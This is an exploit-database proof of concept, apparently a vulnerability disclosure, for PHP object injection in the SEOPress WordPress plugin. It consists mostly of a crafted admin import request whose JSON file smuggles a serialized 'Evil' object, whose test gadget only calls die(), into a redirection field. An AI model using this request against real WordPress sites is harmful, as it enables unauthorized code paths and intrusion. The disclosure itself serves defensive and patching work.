## https://sploitus.com/exploit?id=WPEX-ID:FB8791F5-2879-431E-9AFC-06D5839E4B9D
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
The view the response of the request made, which will have the "Arbitrary deserialization" message
POST /wordpress/wp-admin/admin.php?page=seopress-import-export HTTP/1.1
Host: {host}
Content-Length: 1247
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURsXiXeTIw5lD9oX
Cookie: {cookie}
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="import_file"; filename="seopress-settings-export-03-04-2023.json"
Content-Type: application/json
{"seopress_activated":"","seopress_titles_option_name":"","seopress_social_option_name":"","seopress_google_analytics_option_name":"","seopress_advanced_option_name":"","seopress_xml_sitemap_option_name":"","seopress_pro_option_name":"","seopress_pro_mu_option_name":"","seopress_pro_license_key":"","seopress_pro_license_status":"","seopress_bot_option_name":"","seopress_toggle":"","seopress_google_analytics_lock_option_name":"","seopress_tools_option_name":"","seopress_dashboard_option_name":false,"seopress_instant_indexing_option_name":"","redirections":{"xxx":{"sources":"O:4:\"Evil\":0:{};"}}}
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_action"
import_rk_redirections
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_import_rk_redirections_nonce"
0e1a353e06
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=seopress-import-export
------WebKitFormBoundaryURsXiXeTIw5lD9oX--